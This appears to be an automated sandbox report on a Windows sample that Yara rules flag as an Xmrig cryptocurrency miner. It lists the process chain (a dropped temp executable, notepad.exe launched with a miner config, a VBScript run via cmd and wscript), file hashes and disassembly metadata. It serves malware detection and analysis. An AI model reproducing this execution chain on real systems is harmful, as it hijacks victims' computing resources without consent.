
Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: LZF5sOWnss.exe PID: 6868 Parent PID: 5852

General

Start time:	22:23:57
Start date:	23/07/2021
Path:	C:\Users\user\Desktop\LZF5sOWnss.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\LZF5sOWnss.exe'
Imagebase:	0x7f0000
File size:	16896 bytes
MD5 hash:	0F65B4FA711B40E3C89A81FA69D8690F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6964 Parent PID: 568

General

Start time:	22:23:59
Start date:	23/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4732 Parent PID: 568

General

Start time:	22:24:21
Start date:	23/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tmp70CEtmp.exe PID: 1808 Parent PID: 6868

General

Start time:	22:24:26
Start date:	23/07/2021
Path:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe'
Imagebase:	0x290000
File size:	3627520 bytes
MD5 hash:	D572DA9202196121D952231F26D65D07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5652 Parent PID: 568

General

Start time:	22:24:32
Start date:	23/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6780 Parent PID: 568

General

Start time:	22:24:40
Start date:	23/07/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tmp70CEtmp.exe PID: 6344 Parent PID: 1808

General

Start time:	22:25:09
Start date:	23/07/2021
Path:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Imagebase:	0x560000
File size:	3627520 bytes
MD5 hash:	D572DA9202196121D952231F26D65D07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: tmp70CEtmp.exe PID: 3496 Parent PID: 1808

General

Start time:	22:25:11
Start date:	23/07/2021
Path:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
Imagebase:	0x850000
File size:	3627520 bytes
MD5 hash:	D572DA9202196121D952231F26D65D07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.911228478.0000000003510000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe PID: 5188 Parent PID: 3496

General

Start time:	22:25:12
Start date:	23/07/2021
Path:	C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe
Imagebase:	0xeb0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000000.802901218.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000000.807605036.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000000.805475316.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: notepad.exe PID: 684 Parent PID: 3496

General

Start time:	22:25:16
Start date:	23/07/2021
Path:	C:\Windows\notepad.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Imagebase:	0x7ff7d5e80000
File size:	245760 bytes
MD5 hash:	BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.813001280.0000018B883B5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.908582962.00000000009D7000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.909337744.0000018B884BA000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.909258259.0000018B88392000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5212 Parent PID: 3496

General

Start time:	22:25:35
Start date:	23/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5236 Parent PID: 5212

General

Start time:	22:25:36
Start date:	23/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 5308 Parent PID: 5212

General

Start time:	22:25:36
Start date:	23/07/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Imagebase:	0xc80000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: LZF5sOWnss.exe PID: 6868 Parent PID: 5852 LZF5sOWnss.exeCOMMON

Executed Functions

Function 00007FFA35A60581, Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c95962a9fd6af29c3b01a43f907f1d3465156819d88ffcb77fa07b87ec00bb
Instruction ID: 6a393b15ae1b2f2d743ed8fce2b8e0b4a99c3094ae23a7135f2cd25fb0b6933c
Opcode Fuzzy Hash: 58c95962a9fd6af29c3b01a43f907f1d3465156819d88ffcb77fa07b87ec00bb
Instruction Fuzzy Hash: BA116A1290E7D34FE747A73CA8615A47F71AF5321471A40F3C0C8CB1A3DE19A88AD3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A600A5, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19440fe2e01e97f35ffd6666742dd054a3f889483e95ea65f9129c13fc49cd64
Instruction ID: 7a570543f509c77035ba608f2d785be1fe34e08c7dd9452a43bcab7289e4ef3f
Opcode Fuzzy Hash: 19440fe2e01e97f35ffd6666742dd054a3f889483e95ea65f9129c13fc49cd64
Instruction Fuzzy Hash: 3311B152D1CB974FE3A6932C58AD6B96BE0FF47700B0984BAC05DC74D3DE0929857781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A609D9, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c617d4fcb0a19e0229e6dc7e18078260aaeaa2e8e4bc7d4898f3ea6b5a808e9
Instruction ID: 4a56baa57dc4ee1cc7a5cb6e067ed205e92afa8b64c22db31f45b74996230351
Opcode Fuzzy Hash: 1c617d4fcb0a19e0229e6dc7e18078260aaeaa2e8e4bc7d4898f3ea6b5a808e9
Instruction Fuzzy Hash: 35014816C2DA974EE3E9933CA8596B926D0BF57750F4880B5C04EC71C3CE5E6481B351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A60A55, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0612109222728438abb0bf255a1be8eae66f5f760bdcb7b130f77e15c888cc75
Instruction ID: ba782c519d4996542143b10ec1c09f51f95a470e0c4de4eaeeaca009ffe3fff5
Opcode Fuzzy Hash: 0612109222728438abb0bf255a1be8eae66f5f760bdcb7b130f77e15c888cc75
Instruction Fuzzy Hash: 5EF0F02091EA864FE701E738C8566243BB0FF5728070984B5D00ECB1E3CA29AC098390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A60505, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a0a033971000c6eec681c3bc57e8cf9bffcd09fe5186937165cebd5a4d0185
Instruction ID: 2921342d18f85dd7c689e3a0fc200f1b1b736729b8c196690cf2c9c07adfef71
Opcode Fuzzy Hash: 05a0a033971000c6eec681c3bc57e8cf9bffcd09fe5186937165cebd5a4d0185
Instruction Fuzzy Hash: 59F0E531E4891A8FF5E5B72CA4856A873E2EFDB31031480B8D40CC325BCD6AA8834BC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A60555, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.711359371.00007FFA35A60000.00000040.00000001.sdmp, Offset: 00007FFA35A60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44305d73761c740c68d2970552036b352a44a052c7c4707908947d5d745c83f4
Instruction ID: 965f4e85e59ed7b52b7e7c42cbbc9b8ca219c44ed2adffe3e84daac5b43e7441
Opcode Fuzzy Hash: 44305d73761c740c68d2970552036b352a44a052c7c4707908947d5d745c83f4
Instruction Fuzzy Hash: 1FE0EC4285F2C64FC74347385C295E47FB45E5711074EC1E7C0C8CF5A3C94E598AA721

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: tmp70CEtmp.exe PID: 1808 Parent PID: 6868 tmp70CEtmp.exeCOMMON

Executed Functions

Function 00FAB660, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00FAB6D0
GetCurrentThread.KERNEL32 ref: 00FAB70D
GetCurrentProcess.KERNEL32 ref: 00FAB74A
GetCurrentThreadId.KERNEL32 ref: 00FAB7A3

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ab45ca90f17a84f061d62afc53f18ff1d4659452e9a606d8d78d7286299634b1
Instruction ID: 6716a0c31fefdf0029e90349c74dd00674f06793ddb24398c66aa807248faa42
Opcode Fuzzy Hash: ab45ca90f17a84f061d62afc53f18ff1d4659452e9a606d8d78d7286299634b1
Instruction Fuzzy Hash: 3D5164B8D006498FDB10CFA9C588BDEBBF0BF8A314F248559E409A7391D7B46844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB670, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00FAB6D0
GetCurrentThread.KERNEL32 ref: 00FAB70D
GetCurrentProcess.KERNEL32 ref: 00FAB74A
GetCurrentThreadId.KERNEL32 ref: 00FAB7A3

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 988a05b6646e0c371acc763be054e7547c7c642a944e37fb727d8e46aa3eb001
Instruction ID: fd69303dc13c9035a81409993f1d274ede36abed9feff29c6ffc7d4c068802db
Opcode Fuzzy Hash: 988a05b6646e0c371acc763be054e7547c7c642a944e37fb727d8e46aa3eb001
Instruction Fuzzy Hash: F45142B8D006498FDB10CFA9D588BDEBBF4BF8A314F248459E409A7391D7B46844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9670, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00FA98B6

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a9d9fbccbed54e827779163b9e2c927d8cb2dcfa12a7f010842f73d991a3dddc
Instruction ID: 51a62aee19843e150f573b831258e07a41cec8a9277f281f24c9632e5a6347d2
Opcode Fuzzy Hash: a9d9fbccbed54e827779163b9e2c927d8cb2dcfa12a7f010842f73d991a3dddc
Instruction Fuzzy Hash: 457124B0A04B058FDB24DF6AD44579AB7F1FF89314F00892DE48AD7B40DBB5E8058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFCCC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFDEA

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dd318cfe2d52cf46bd8e0c7246b15dc94a56657a42452291d7b82f8ae003698e
Instruction ID: 4f01b414a847e6d79550925474c91a382896b9c5f4190e1bee9e8c7cdd201bc6
Opcode Fuzzy Hash: dd318cfe2d52cf46bd8e0c7246b15dc94a56657a42452291d7b82f8ae003698e
Instruction Fuzzy Hash: 8D51E0B1D00309DFDB14CFA9C884ADEBBB5BF49314F24822AE819AB210D7759985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFCD8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFDEA

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 99f5e334cc767a739a455c811f224ff7507549919cbffde700267ae0cff9ec25
Instruction ID: c000f8ab85cc01a3d63c873f3d7d08ca7b69ad2410f9c2f88be5e932196070df
Opcode Fuzzy Hash: 99f5e334cc767a739a455c811f224ff7507549919cbffde700267ae0cff9ec25
Instruction Fuzzy Hash: 8D41CFB1D00309DFDB14CF9AD884ADEFBB5BF49314F24812AE819AB210D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA5354, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FA5411

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d95abf9df4ecdb321ff47fe12a962048e4374f872931bb9b529f8bdbdb234867
Instruction ID: c1538768e69ed8ec2062ce5c2129ff96b87b9d0fbf7cb58367932fa998c63c52
Opcode Fuzzy Hash: d95abf9df4ecdb321ff47fe12a962048e4374f872931bb9b529f8bdbdb234867
Instruction Fuzzy Hash: 4E41F3B1C04619CFDB24CFA9C894BDDBBB5FF49308F208069D518AB251D7B5594ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FA5411

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1db206663d8a64816f5f9f8e3ea746ecfe734417cb5ba32d08e4119f7b99d956
Instruction ID: 1115efd0742ccedf0bb3f133ddeec9c8dd9c82be0eeb9d995e81392987fdcb27
Opcode Fuzzy Hash: 1db206663d8a64816f5f9f8e3ea746ecfe734417cb5ba32d08e4119f7b99d956
Instruction Fuzzy Hash: 2941F1B1C0461DCBDB24CFA9C894BDEBBB5FF49308F208069D508AB251D7B5694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB890, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAB91F

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0d040144c8e60bbc3cfcebcc19ed32449fd88ebec90dc154b576de360405ace8
Instruction ID: 6691800093a7e7088bb7aa70a3b8c3c53592a6f4aff8f6c77c99227d8aca805a
Opcode Fuzzy Hash: 0d040144c8e60bbc3cfcebcc19ed32449fd88ebec90dc154b576de360405ace8
Instruction Fuzzy Hash: 1821D2B5900249AFDB10CFAAD884ADEBBF4FB49324F14801AE954A3311D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAB898, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAB91F

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d446878e53b56fbe6ea4d269871cb97e1e25a1232781de361b593259133340b0
Instruction ID: c8e23ef575ef26b1344655d2d1809e09e81c181c3b0cff360c80d6167b724c33
Opcode Fuzzy Hash: d446878e53b56fbe6ea4d269871cb97e1e25a1232781de361b593259133340b0
Instruction Fuzzy Hash: 2C21E2B5D00208AFDB10CFAAD884ADEBBF8FB49324F14801AE914B3310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9288, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FA9931,00000800,00000000,00000000), ref: 00FA9B42

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 99bbec667eb05d13d544d770cc1fe561b178a8e1cde7720f5c379750988c8310
Instruction ID: 091314d526252f169143113f35513fed3483031d3ebdff53f37debf7b82719d7
Opcode Fuzzy Hash: 99bbec667eb05d13d544d770cc1fe561b178a8e1cde7720f5c379750988c8310
Instruction Fuzzy Hash: 7A11F2B69042488FCB10CF9AD448BDEFBF4EB89364F14842AE515B7600C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9AD1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FA9931,00000800,00000000,00000000), ref: 00FA9B42

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f445af9b996d583ef121a5ae45c0e162d5384cdf02b0b364ac32083982415b39
Instruction ID: c1429c65cb4b8b3f75b098fe66b9846e7e153fbd0747c6d4955f6e1c58575567
Opcode Fuzzy Hash: f445af9b996d583ef121a5ae45c0e162d5384cdf02b0b364ac32083982415b39
Instruction Fuzzy Hash: 2F1106B2D002498FCB10CF9AD448ADEFBF4EB89364F14842AD415A7200C3B59545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9850, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00FA98B6

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 04627f84985239967a73f4ee84a758aee40740f6a83f896d030f2e772c5795bc
Instruction ID: 36225f0865cbc3ae2e9a072467a70235f0d04d934e4e97f79d16f7a8c46e3240
Opcode Fuzzy Hash: 04627f84985239967a73f4ee84a758aee40740f6a83f896d030f2e772c5795bc
Instruction Fuzzy Hash: A911D2B5D002498FDB10CF9AD444BDEFBF4EB8A324F14842AD419B7600D3B9A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFF1A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00FAFF7D

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 29f106ca2974d79331f109db49f975acdaaa6ebc2278012eab63933d0e23c43e
Instruction ID: ea013548ea69fc4c69e7b0b5ed3731516daa5851c941c993b15f28ef12f9cdcc
Opcode Fuzzy Hash: 29f106ca2974d79331f109db49f975acdaaa6ebc2278012eab63933d0e23c43e
Instruction Fuzzy Hash: B811F5B58002499FDB10CF99D488BDEBBF8EB49324F10851AE854A7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFF20, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00FAFF7D

Memory Dump Source

Source File: 00000004.00000002.801710972.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d888ce5579afe6de1f382074be97957ac010ea7f8bed4dafd5d7df7dbfc5b856
Instruction ID: c003ef4ba342df006ade4439a3f94b43f146d46afc86b2d1797b354bc757b9e4
Opcode Fuzzy Hash: d888ce5579afe6de1f382074be97957ac010ea7f8bed4dafd5d7df7dbfc5b856
Instruction Fuzzy Hash: AC11D0B59003499FDB10CF9AD588BDEBBF8EB49324F10851AE919B7740C3B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DBD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801565652.0000000000DBD000.00000040.00000001.sdmp, Offset: 00DBD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe9e71a57236ed8fd504c1981ac70af4ab7b71f74ef6b7491c3b251c4f5b714
Instruction ID: dee7f64d7e1b31f499c5f6630514406e0f0c5c12bb19e4a40b890f4f6dc5aa2f
Opcode Fuzzy Hash: 7fe9e71a57236ed8fd504c1981ac70af4ab7b71f74ef6b7491c3b251c4f5b714
Instruction Fuzzy Hash: 4F2137B1504240DFCB25DF10D9C0F66BFA6FB88328F24C569E9464B24AD336E846CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcfff83a4b060f1275ad27224eae7fe23103ec7e18834bc5f45938c20cfc765
Instruction ID: 678de53d935509ef0e1ce8c9c6e724f703a2ca8881fb4c3cd312ab92923e8d2d
Opcode Fuzzy Hash: ffcfff83a4b060f1275ad27224eae7fe23103ec7e18834bc5f45938c20cfc765
Instruction Fuzzy Hash: 2D21B0B15042409FCB14CF18D8C4F16BBA6FB84314F24C57DE9494B246C376D847DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94845454f51d0536adbd188b5a7e16d135a73bf3c71560513d86fff70217df3
Instruction ID: 2f08601171eeaffb6e2436b9677d3b9396598c99dadeb317ca92cbfaa481805c
Opcode Fuzzy Hash: e94845454f51d0536adbd188b5a7e16d135a73bf3c71560513d86fff70217df3
Instruction Fuzzy Hash: 7421CFB1504201AFDB05DF10D9C4F26FBA6FB88318F28CABDE9494B246C376D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD2BC, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503cb55dd728bc1eaac1305573416ea1702babf94c23adc3652be945399d381f
Instruction ID: 95575580981a0ea95666cee230401fc798cc94d9b4245c256664e1a028dc6bd8
Opcode Fuzzy Hash: 503cb55dd728bc1eaac1305573416ea1702babf94c23adc3652be945399d381f
Instruction Fuzzy Hash: D921F3B15082819FD704DF14D9C4F2ABBA6FB84724F28857DD9494B245C379E806C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.801589520.0000000000DCD000.00000040.00000001.sdmp, Offset: 00DCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ddbfc108eb970c698d6dc7bd4f1c176065a7a00a75a1c284ffe666863dfda5f
Instruction ID: 0ef8e524755ed667a74480289fde8994f508beaf6e721af6840d7f68f124893f
Opcode Fuzzy Hash: 4ddbfc108eb970c698d6dc7bd4f1c176065a7a00a75a1c284ffe666863dfda5f
Instruction Fuzzy Hash: AE2180755093C08FCB12CF24D994B15BF71EB46314F28C5EED8498B697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DBD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

